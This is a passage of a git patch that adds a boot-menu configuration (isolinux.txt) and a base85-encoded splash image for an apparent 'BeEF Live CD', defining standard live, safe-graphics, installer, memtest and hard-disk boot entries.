 create mode 100644 liveCD/splash.png

diff --git a/liveCD/isolinux.txt b/liveCD/isolinux.txt
new file mode 100644
index 000000000..76cdda09e
--- /dev/null
+++ b/liveCD/isolinux.txt
@@ -0,0 +1,34 @@
+default vesamenu.c32
+prompt 0
+timeout 100
+
+menu title BeEF Live CD
+menu background splash.png
+menu color title 1;37;44 #c0ffffff #00000000 std
+
+label live
+  menu label live - BeEF Beef Live
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash --
+
+label xforcevesa
+  menu label xforcevesa - boot Live in safe graphics mode
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper xforcevesa initrd=/casper/initrd.gz quiet splash --
+
+label install
+  menu label install - start the installer directly
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper only-ubiquity initrd=/casper/initrd.gz quiet splash --
+
+label memtest
+  menu label memtest - Run memtest
+  kernel /install/memtest
+  append -
+
+label hd
+  menu label hd - boot the first hard disk
+  localboot 0x80
+  append -
+
+
diff --git a/liveCD/splash.png b/liveCD/splash.png
new file mode 100644
index 0000000000000000000000000000000000000000..8f1965468561137ab29e0cc09f8a653f071de7c1
GIT binary patch
literal 37807
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
